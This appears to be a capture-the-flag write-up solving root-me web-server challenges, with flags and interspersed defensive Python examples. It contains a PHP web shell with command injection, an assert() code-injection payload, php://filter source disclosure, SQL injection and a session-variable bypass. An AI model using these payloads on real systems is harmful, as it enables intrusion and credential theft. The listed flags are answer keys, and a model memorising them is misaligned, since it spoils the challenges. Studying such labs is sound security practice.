Check the source code.  You can see that when an option is selected, you are redirected to, for example, https://facebook.com&h=….  We need to figure out what the value following ‘&h=’ is so we can structure our redirect url accordingly.  Using an online MD5 hash lookup, we see the value is the MD5 hash of the particular url.  MD5 hash ‘https://google.com’ and note the value.  Start Tamper Data and click the facebook link.  Edit the url so the website redirects to ‘?url=https://google.com&h=<MD5 hash of https://google.com>’ instead of facebook.  Then submit the page.

e6f8a530811d5a479812d7b82fc1a5c5
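The `h` parameter above is an unkeyed MD5 of the destination, so anyone can compute a valid value for any URL. The Python below is an added example (not the root-me challenge's own code) that reproduces that check next to one that holds: an HMAC over the destination with a server-side key, plus a host allowlist, compared in constant time. The key, the allowed hosts and the function names are assumptions for the example.

```python
import hashlib
import hmac
from urllib.parse import urlparse

def weak_token(url):
    """Unkeyed MD5 of the URL: computable by anyone, so it proves nothing about who built the link."""
    return hashlib.md5(url.encode()).hexdigest()

def weak_redirect_allowed(url, h):
    """The challenge's check: redirect wherever the URL says, as long as h matches its MD5."""
    return weak_token(url) == h

# Constructed server-side secret; in a real deployment it comes from configuration, never from code.
SERVER_KEY = b"constructed-example-key-not-for-real-use"
ALLOWED_HOSTS = {"facebook.com", "twitter.com"}

def signed_token(url, key=SERVER_KEY):
    """HMAC-SHA256 over the destination; only the server can produce it."""
    return hmac.new(key, url.encode(), hashlib.sha256).hexdigest()

def hardened_redirect_allowed(url, h, key=SERVER_KEY):
    """Destination must be on the allowlist AND carry a token made with the server key."""
    if urlparse(url).hostname not in ALLOWED_HOSTS:
        return False
    return hmac.compare_digest(signed_token(url, key), h)
```

Either layer alone already stops the forged `https://google.com` link; together, the allowlist bounds where a redirect can ever go, and the keyed token stops a client from minting links even to allowed hosts that the server never issued.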


User-Agent

Use Tamper Data to change the User-Agent from its original value to ‘admin’.

rr$Li9%L34qd1AAe27


HTTP Directory Indexing

Clue: Control + U

<!-- include("admin/pass.html") -->

Navigate to:

http://challenge01.root-me.org/web-serveur/ch4/admin/pass.html

J’ai bien l’impression que tu t’es fait avoir / Got rick rolled ? 😉
T’inquiète tu n’es pas le dernier / You’re not the last :p

Cherche BIEN / Just search

Traverse up to the admin directory

/web-serveur/ch4/admin/

File Name  ↓  File Size  ↓  Date  ↓ 
Parent directory/
backup/ 02-Apr-2013 12:35
pass.html 346 24-Oct-2015 11:14

Select backup, then admin.txt

Password: LINUX


HTTP Tampering

‘Http response gives us informations’

I used the Firefox extension ‘Open HTTP Requester’ to solve this challenge.  Issuing a request to the page I see a header named ‘Header-Rootme-Admin’ with a value set to none.  To successfully complete the challenge I issued the request again, this time adding a custom header to the request: ‘Header-Rootme-Admin’ with a value of ‘admin’.

HeadersMayBeUseful


Verb Tampering

Authorization can sometimes be bypassed by tampering with HTTP methods.  For this exercise I utilized the Firefox extension ‘Open HTTP Requester’ to send a PUT request to http://challenge01.root-me.org/web-serveur/ch8/ and get the password to the challenge.

a23e$dme96d3saez$$prap


Install Files

‘You know phpbb’

phpBB’s installation script is located at ‘phpbb/install/install.php’, so I appended that to the end of the challenge’s URL.

karambar


Improper Redirect

To solve this challenge I used OWASP’s ZAP Proxy to capture the request sent to http://challenge01.root-me.org/web-serveur/ch32/index.php

[screenshot: Selection_309]


File Upload

Double File Extension

Referring to the documentation provided along with this challenge, I wrote a quick php script:

<?php
// Runs whatever the 'command' query parameter contains (the challenge's web shell).
system($_GET['command']);
?>

and saved it as php_shell.php.jpg.  Sometimes you can trick the web server into accepting your PHP file by adding an acceptable file extension (jpg, png, gif) after the PHP file extension.  After uploading the file, we navigate to it and inject our command into the URL.

‘…..php_shell.php.jpg?command=cat ../../../.passwd’


 

File Upload

MIME Type

For this challenge, we use Burp to capture the POST request sent to the server when uploading our PHP shell script and change the ‘Content-Type’ from ‘application/x-php’ to ‘image/jpeg’.  This tricks the server into accepting the upload, thinking it’s a JPG file.  Click the icon for our file and, like before, inject our command into the URL:

http://challenge01.root-me.org/web-serveur/ch21/galerie/upload/gsejso5erm5ahvm8i561a9tdh7//shell.php?command=cat%20../../../.passwd

a7n4nizpgQgnPERy89uanf6T4


HTTP Cookies

This challenge really irritated me because it took me 3 different plugins to find one that would work.  Once I did, solving the challenge was a no-brainer.  Click on ‘saved email addresses’ and we get an error that says we must be admin.  Checking the URL:

http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur

Simply replacing ‘visiteur’ with ‘admin’ gives an error that says there’s an issue with the cookie value.  Install the Firefox plugin ‘Live HTTP Headers’ and click the ‘Saved email addresses’ link again.  In Live HTTP Headers, you can see the cookie: ch7=visiteur. Click ‘replay’ and change ‘visiteur’ to ‘admin’, then replay again. In the browser click the link once more to find the validation password.
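Both the Open Redirect challenge (a `&h=md5(url)` check anyone can recompute) and this cookie challenge (`ch7=visiteur` trusted as the role) fail for the same reason: a value the client can edit is used as if the server had vouched for it. The following is an added example for this page, not code from root-me or either challenge. It shows the unkeyed MD5 token beside an HMAC token that needs a server-side secret, adds a redirect host allowlist, and applies the same keyed tag to the role cookie. The secret, the allowlisted hosts and the cookie layout are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed secret for the example; a real deployment loads it from configuration.
SERVER_SECRET = b"example-secret-do-not-use-in-production"

# Constructed allowlist of hosts the site is willing to redirect to.
ALLOWED_REDIRECT_HOSTS = {"facebook.com", "twitter.com"}


def weak_token(url: str) -> str:
    """The challenge's scheme: h = md5(url). No secret is involved, so any
    client can compute a 'valid' h for any url of its choosing."""
    return hashlib.md5(url.encode()).hexdigest()


def weak_check(url: str, h: str) -> bool:
    return hmac.compare_digest(weak_token(url), h)


def sign(value: str) -> str:
    """Keyed tag: only a party holding SERVER_SECRET can produce it."""
    return hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()


def verify(value: str, tag: str) -> bool:
    return hmac.compare_digest(sign(value), tag)


def safe_redirect_target(url: str, tag: str):
    """Return url only if its tag verifies AND its host is on the allowlist.
    The allowlist is the real control; the tag just stops casual edits."""
    if not verify(url, tag):
        return None
    if urlsplit(url).hostname not in ALLOWED_REDIRECT_HOSTS:
        return None
    return url


def make_role_cookie(role: str) -> str:
    """Cookie value 'role.tag' in place of the bare ch7=visiteur."""
    return f"{role}.{sign(role)}"


def role_from_cookie(cookie_value: str) -> str:
    """Parse the cookie; editing the role part invalidates the tag and the
    request falls back to the least-privileged role."""
    role, sep, tag = cookie_value.rpartition(".")
    if not sep or not verify(role, tag):
        return "visiteur"
    return role


if __name__ == "__main__":
    forged = weak_token("https://google.com")          # computable by anyone
    print("md5 check accepts forged token:", weak_check("https://google.com", forged))
    print("hmac+allowlist:", safe_redirect_target("https://google.com", forged))
    print("edited cookie ->", role_from_cookie("admin"))
    print("issued cookie ->", role_from_cookie(make_role_cookie("admin")))
```

Where the role must not be readable by the client at all, store it server-side and put only an opaque session identifier in the cookie; the keyed tag above is the lighter option when the value itself is not secret.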

 


PHP Assert()

In PHP, assert() evaluates whether the supplied assertion is TRUE or FALSE and, if FALSE, takes the configured action.  When the assertion is passed as a string, PHP evaluates that string as code, so anything injected into it runs.

We have the following url:

http://challenge01.root-me.org/web-serveur/ch47/?page=home


http://challenge01.root-me.org/web-serveur/ch47/?page=index.php../../../../../etc/passwd.php throws the following error:

Warning: assert(): Assertion "strpos('includes/index.php../../../../../etc/passwd.php', '..') === false"

http://challenge01.root-me.org/web-serveur/ch47/?page=','s') and system('cat .passwd') and strpos('


File Upload

Null Byte

Passing this level is super easy.  Use the same shell as before.  Say the file name of your shell is shell.php.  Rename it to shell.php%00.jpg.  When submitted, the .jpg file extension is dropped because of the preceding null byte.  Once the file has uploaded, click it.

YPNchi2NmTwygr2dgCCF
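The three upload bypasses above (double extension, spoofed Content-Type, null byte) all rely on the server trusting the name and type the client supplies. The following validator is an added example written for this page, not code from root-me or the challenges. It treats only the final extension as meaningful, rejects embedded NUL bytes, sniffs the content's magic bytes instead of believing the declared Content-Type, and stores the file under a server-chosen random name. The allowlist, magic table and sample bytes are constructed assumptions.

```python
import os
import secrets

# Allowed final extensions and the content type each must actually contain.
ALLOWED = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
           "png": "image/png", "gif": "image/gif"}

# Magic-byte prefixes used to sniff the real type, independent of the
# Content-Type field in the multipart request (constructed table).
MAGIC = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
]

# Constructed sample payloads: a minimal JPEG header and the page's shell.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12
SAMPLE_PHP = b"<?php system($_GET['command']); ?>"


def sniff_type(data: bytes):
    """Return the MIME type implied by the leading bytes, or None."""
    for prefix, mime in MAGIC:
        if data.startswith(prefix):
            return mime
    return None


def validate_upload(filename: str, data: bytes, claimed_type: str):
    """Return (stored_name, mime) if the upload is acceptable, else (None, reason).

    Rejects: NUL in the name, no extension, a final extension outside the
    allowlist, content whose magic bytes do not match that extension, and a
    declared Content-Type that disagrees with the sniffed one.
    """
    if "\x00" in filename:
        return None, "null byte in filename"
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return None, "no extension"
    ext = base.rsplit(".", 1)[1].lower()        # only the LAST extension counts
    mime = ALLOWED.get(ext)
    if mime is None:
        return None, f"extension .{ext} not allowed"
    if sniff_type(data) != mime:
        return None, "content does not match extension"
    if claimed_type != mime:
        return None, "declared Content-Type disagrees with content"
    # Server-chosen name: the original name, and any '.php.' inside it, never
    # reaches the filesystem, so multi-extension handler rules cannot fire.
    return f"{secrets.token_hex(16)}.{ext}", mime


if __name__ == "__main__":
    for name, data, ctype in [
        ("php_shell.php.jpg", SAMPLE_PHP, "image/jpeg"),   # double extension
        ("shell.php", SAMPLE_PHP, "image/jpeg"),           # spoofed Content-Type
        ("shell.php\x00.jpg", SAMPLE_JPEG, "image/jpeg"),  # null byte
        ("holiday.jpg", SAMPLE_JPEG, "image/jpeg"),        # legitimate
    ]:
        print(repr(name), "->", validate_upload(name, data, ctype))
```

Store the resulting files outside the document root or in a directory the web server is configured not to execute scripts from; the validator reduces what gets written, the deployment decides what could run.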

 


Directory Traversal

We have a URL like this: http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=emotes.

The parameter galerie displays different categories.  We can deduce that ‘galerie’ holds all the files.  Navigating to http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie= we can see a hidden folder beginning with ’86hv’.  Hover over the icon, right click, and select ‘inspect element’ to get the full folder name.

86hwnX2r

[screenshot: Selection_311]

Navigate to http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=86hwnX2r, you’ll see a file password.txt.  Right click and view the source code.  Click the ‘password.txt’ hyperlink for the password.

kcb$!Bx@v4Gs9Ez


PHP Filter

PHP filters transform data as it passes through a stream; they are commonly used to validate, sanitize or re-encode external input.

There are a number of filters that can be applied.  One built-in family is convert.*, which includes convert.base64-encode and convert.base64-decode; the former is used in this exploit.

The URL form is php://filter/<filter to use>/resource=<file>

In this exploit:

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode

When clicking the login hyperlink, we can see what the script is doing:

http://challenge01.root-me.org/web-serveur/ch12/?inc=login.php

php://filter/convert.base64-encode/resource allows us to read the source of any PHP file.  It forces PHP to base64-encode the file before it is used in the require statement.  Decoding the base64 string then gives us the source code of whichever PHP file is named by the ‘resource’ parameter.

Example:

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=index.php

We continue guessing helpful php files such as config.php

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php

<?php
$username="admin";
$password="DAPt9D2mky0APAF";
?>
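The PHP assert(), Directory Traversal and PHP Filter challenges above are three faces of one defect: a request parameter is turned into a file path with, at best, a string search for `..` standing in for validation. The following is an added example for this page, not code from root-me or any of the challenges. It resolves a `?page=` value the way a hardened include would: reject NUL bytes and stream wrappers, canonicalise the path and check it is still under the includes directory, then require the page to be on an allowlist. The directory, the page names and the `.php` suffix rule are constructed assumptions.

```python
import os
import re

# Constructed paths and page names standing in for the challenge's includes/
# directory; they are assumptions for this example, not the challenge's values.
BASE_DIR = os.path.realpath("/var/www/app/includes")
ALLOWED_PAGES = {"home", "login", "index"}

# Anything that looks like a scheme: php://filter/..., data:, phar:// ...
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def resolve_page(page: str):
    """Map an already URL-decoded ?page= value to a file under BASE_DIR, or None.

    The value is taken as the framework decoded it and is NOT decoded again;
    a second decode is exactly what turns an encoded '%2f' into a real slash.
    Checks, in order:
      1. no NUL byte (a NUL truncates the path in C-based runtimes);
      2. no stream wrapper or scheme prefix, so php://filter/ cannot be used;
      3. the canonical path (realpath collapses ../ and symlinks) is still
         under BASE_DIR. This also defeats an absolute value such as
         /etc/passwd, which os.path.join would otherwise let replace BASE_DIR;
      4. the resulting page name is in a fixed allowlist.
    None of this relies on stripping or searching for '..' in the string.
    """
    if "\x00" in page:
        return None
    if SCHEME.match(page):
        return None
    candidate = os.path.realpath(os.path.join(BASE_DIR, page + ".php"))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    name = os.path.basename(candidate)
    if not name.endswith(".php") or name[:-4] not in ALLOWED_PAGES:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs: the page's own traversal and wrapper payloads plus a benign value.
    for value in ["home",
                  "index.php../../../../../etc/passwd.php",
                  "../../../.passwd",
                  "php://filter/convert.base64-encode/resource=config.php",
                  "/etc/passwd"]:
        print(repr(value), "->", resolve_page(value))
```

The allowlist is what makes the string-evaluated assert() unnecessary: there is no expression built from user input left to evaluate, so there is nothing for `', 's') and system(...)` to break out of.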

PHP Globals

Navigate to …./index.php.bak and open the file.

This is the important stuff

…..

if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || (is_array($_SESSION) && $_SESSION["logged"]==1 ) ){
$aff=display("well done, you can validate with the password : $hidden_password");
} else {
$aff=display("try again");
}

…….

In other words: if the password is correct, OR $_SESSION["logged"] equals 1, the page prints “well done, you can validate with the password: …”.

So let’s add ‘?_SESSION[logged]=1’ to the URL.

http://challenge01.root-me.org/web-serveur/ch17/?_SESSION%5Blogged%5D=1

well done, you can validate with the password : NoTQYipcRKkgrqG

SQL Injection

Find administrator password.

On the first try I got it.  User name admin, password ' or 1=1--

The next page says ‘Welcome user1’ then has the password of the user obscured.  Highlight the entry and right click your mouse then select ‘inspect element’.